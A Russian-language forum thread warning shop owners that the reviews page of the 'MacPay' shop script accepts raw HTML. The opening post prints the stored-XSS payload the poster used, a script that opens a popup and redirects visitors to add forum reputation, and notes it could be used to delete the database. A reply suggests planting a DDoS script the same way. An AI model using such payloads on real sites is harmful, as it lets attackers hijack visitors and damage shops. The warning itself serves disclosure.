Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

[ВНИМАНИЕ] Переадресация macpay

Тема в разделе Мануалы, способы заработать, создана пользователем iNews, 17 июн 2014.

Войдите для ответа
  1. iNews Official Administration

    iNews
    Статус:
    Вне сети
    Сообщения:
    264
    Симпатии:
    41
    Регистрация:
    10.05.15
    Внимание! Все Администраторы магазинов со скриптом от MacPay или как он там называется


    ps http://lolzteam.ru/t12847/


    Почему "или как он там называется"?


    Так потому-что при установке там вообще fox какой-то, а 40% скрипта от стандартного lazzypay и сам MacPay его кажется не использует, название я считаю сделано для пиара..


    Так вот, перейдем к багу можно сказать.


    Когда вы установили скрипт, то вверху у вас будет страничка с отзывами: /reviews


    А у этих отзывов есть функция поддерживать html код.


    Например, я сделал на своем тестовом сайте, переадресацию на мой профиль лолза.


    ps Добро пожаловать! - Переадресация происходит через 4сек + открывается новое окошко. Так что, тестируйте все, прежде чем добавлять свой товар на "дырявые" скрипты.


    Если немного повозится, можно не только переадресацию сделать, а открыть допустим форму _get и удалить к херам всю вашу базу :D


    Фиксите сами, это делается в 5минут, ну или тупо удалите страницу.


    Скрипт который я туда вставил:



    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><title>SomeTitle</title><script LANGUAGE="Javascript"> <!--function OpenWin(){windop = window.open("http://lolzteam.ru/reputation.php?do=addreputation&p=47584","WinName","height=120,width=300");}</SCRIPT></head><body onload="OpenWin();"></body></html>
    <head><meta http-equiv="refresh" content="10;URL=http://lolzteam.ru/reputation.php?do=addreputation&p=47584" /></head>[/HTML]
     
    17 июн 2014 #1
    Последнее редактирование модератором: 17 июн 2014
  2. Own-Shop Суприм

    Own-Shop
    Статус:
    Вне сети
    Сообщения:
    12
    Симпатии:
    2
    Регистрация:
    01.06.15
    Хехе.


    Знал. alert/cmd и прочие работают.


    ну или же встроить скрипт ддоса. и вот тебе ддосер.


    а алучше гугл паука фреймом 50000000раз и самого сбя ддосить :D
     
    17 июн 2014 #2
  3. iNews Official Administration

    iNews
    Статус:
    Вне сети
    Сообщения:
    264
    Симпатии:
    41
    Регистрация:
    10.05.15
    Так я для помощи это выложил, а не чтоб пользовались дыркой :D Зря идеи подал..
     
    17 июн 2014 #3
Загрузка...
Похожие темы
  1. iNews
    Ответов:
    0
    Просмотров:
    405
Top